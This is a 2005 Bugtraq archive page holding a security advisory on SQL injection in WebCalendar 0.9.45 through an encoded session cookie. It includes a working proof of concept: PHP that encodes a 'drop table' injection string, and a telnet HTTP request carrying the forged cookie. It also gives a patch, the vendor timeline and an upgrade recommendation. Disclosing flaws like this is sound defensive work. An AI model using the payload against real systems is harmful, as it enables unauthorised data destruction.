[ SCL-2005.001 ] - WebCalendar: SQL Injection from encoded cookie

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [ SCL-2005.001 ] - WebCalendar: SQL Injection from encoded cookie
From: Scovetta Labs <security@xxxxxxxxxxxxxxxx>
Date: Thu, 17 Feb 2005 02:03:57 -0500
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: Scovetta Labs
User-agent: Mozilla Thunderbird 1.0 (Windows/20041206)

=====[BEGIN-SCL-REPORT]=====

________________________________________________________________________

                   Scovetta Labs Security Advisory

 Title:         WebCalendar: SQL Injection from encoded cookie
 Status:        Public
 Release Date:  2005-02-16
________________________________________________________________________

 Package:       WebCalendar
 Vendor:        k5n.us - http://www.k5n.us/webcalendar.php
 Priority:      High
 Vulnerability: SQL Injection


Affected Versions:
==================

 0.9.45 is vulnerable.
 Previous versions have not been tested.


Background: (official description)
===========

 WebCalendar is a PHP-based calendar application that can be configured
 as a single-user calendar, a multi-user calendar for groups of users,
 or as an event calendar viewable by visitors. MySQL, PostgreSQL,
 Oracle, DB2, Interbase, MS SQL Server, or ODBC is required.
 WebCalendar can be downloaded from [1].


Description:
============

 WebCalendar is vulnerable to SQL Injection attacks launched through
 an encoded cookie that is inserted into a request. Using a locally
 installed version, and an MSSQL back-end database (ODBC), we were
 able to drop an arbitrary table from the database by launching an
 attack as a non-authenticated user.


Analysis:
=========

 The user_valid_crypt function (includes/user.php) fails to validate
 that the login name consists of legal characters. This function is
 called from a validation routine (includes/validate.php), with
 data derived from the cookie. The cookie is encoded (not encrypted)
 and consists of data in the following format:

        [login]|[salt][crypt(password, salt)]

 When the cookie is decoded, the login is placed into a SQL query and
 executed. Based on the data returned, the user is either authenticated
 or otherwise the cookie is cleared and the user is directed to login
 again.

 The vulnerability is exacerbated when the underlying database allows
 for multiple SQL queries to be executed together, as in:

        select 1; select 2; select 3;


Exploit:
========

 <?php
   include_once 'includes/init.php';
   echo encode_string("'; drop table foo; select 'a|zzabcdefg");
 ?>

 output:
   7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd \
   94897d7882858abbb8

 attack payload:

   telnet servername
   GET /login.php HTTP/1.1
   Cookie: webcalendar_session=7c8c3a738e858f4199b6b386743c7c \
           8e906075c47f7b817993414cb6cd94897d7882858abbb8


Work-around:
============

 You can mitigate this by using the following diff patch:

39a40
>           $login = addslashes($login);

 The vendor has released version 0.9.5 which includes a fix for
 this issue. All users are encouraged to upgrade to the latest
 version of WebCalendar.


Vendor Response:
================

 2005-01-31 - Vulnerability discovered.
 2005-02-01 - Vendor contacted.
 2005-02-01 - Response received from vendor.
 2005-02-09 - Version 1.0RC2 released on vendor site[2].
 2005-02-16 - Advisory released.


Revision History
================

2005-02-01: Initial Draft
2005-02-14: Public Release [0]


Credits:
========

 Michael Scovetta of Scovetta Labs discovered this vulnerability.


References:
==========

 [0] http://www.scovettalabs.com/advisory/SCL-2005.001.txt
 [1] http://www.k5n.us/webcalendar.php
 [2] http://www.k5n.us/files/WebCalendar-1.0RC2.zip


Disclaimer
==========

 The content of this report is purely informational and meant only
 for the purpose of education and protection. Scovetta Labs and
 Michael Scovetta shall in no event be liable for any damage
 whatsoever, direct or implied, arising from use or spread of this
 information. All identifiers (hostnames, IP addresses, company names,
 individual names etc.) used in examples and demonstrations are used
 only for explanatory purposes and have no connection with any real
 host, company or individual. In no event should it be assumed that
 use of these names means specific hosts, companies or individuals
 are vulnerable to any attacks nor does it mean that they consent to
 being used in any vulnerability tests. The use of information in
 this report is entirely at user's risk.


Copyright
=========

 (c) 2005 Michael Scovetta. Forwarding and publishing of this document
 is permitted providing the content between "[BEGIN-SCL-REPORT]" and
 "[END-SCL-REPORT]" marks remains unchanged.


=====[END-SCL-REPORT]=====


--
Michael SCovetta
Scovetta Labs
www.scovettalabs.com

Prev by Date: RE: BrightStor ARCserve Backup buffer overflow PoC (fixes available)
Next by Date: Re: International Domain Name [IDN] support in modern browsers allows attackers to spoof domain name URLs + SSL certs.
Previous by thread: RE: BrightStor ARCserve Backup buffer overflow PoC (fixes available)
Next by thread: Remote Windows Kernel Exploitation - Step Into the Ring 0
Index(es):
- Date
- Thread